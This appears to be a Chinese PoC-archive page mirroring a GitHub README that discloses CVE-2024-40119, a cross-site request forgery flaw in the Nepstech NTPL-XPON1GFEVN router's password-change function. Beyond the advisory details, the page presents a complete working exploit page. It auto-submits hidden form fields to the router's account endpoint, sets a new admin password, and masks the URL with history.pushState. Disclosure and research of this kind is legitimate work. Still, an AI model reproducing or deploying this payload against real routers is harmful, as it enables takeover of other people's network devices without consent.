目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2024-40119 PoC — Nepstech NTPL-XPON1GFEVN 安全漏洞

来源
https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119
关联漏洞
标题:Nepstech NTPL-XPON1GFEVN 安全漏洞 (CVE-2024-40119)
Description:Nepstech NTPL-XPON1GFEVN是Nepstech公司的一款无线路由器。 Nepstech NTPL-XPON1GFEVN 1.0固件2.0.1版本存在安全漏洞,该漏洞源于密码更改功能中存在跨站请求伪造(CSRF)漏洞,导致攻击者可通过更改管理员密码进行帐户接管。
Description
Cross-Site Request Forgery (CSRF) vulnerability in the password  change function, which allows remote attackers to change the admin  password without the user's consent, leading to a potential account  takeover.
介绍
# nepstech-xpon-router-CVE-2024-40119

# Author:
Subhodeep Baroi

# CVE-2024-40119: CSRF Vulnerability in Nepstech Wifi Router NTPL-XPON1GFEVN v1.0

## Description

**CVE-2024-40119** is a Cross-Site Request Forgery (CSRF) vulnerability in the Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 firmware v2.0.1. This vulnerability allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.

## Details

- **Vulnerability Type:** Cross-Site Request Forgery (CSRF)
- **Vendor of Product:** Nepstech
- **Affected Product Code Base:** Wifi Router xpon (terminal) - Model: NTPL-XPON1GFEVN - Version: 1.0 and Firmware: V2.0.1
- **Affected Component:** Router web app password-changing functionality
- **Attack Type:** Remote
- **Impact:** Admin Account Takeover

## Attack Vectors

A remote attacker can craft a malicious HTML page that triggers the password change functionality when visited by an authenticated user. Below is a sample attack vector:

```html
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
文件快照

 [4.0K]  /data/pocs/a2f7cebfa3f4169c381dc88ad3708a7728f0d3c7
└── [1.8K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。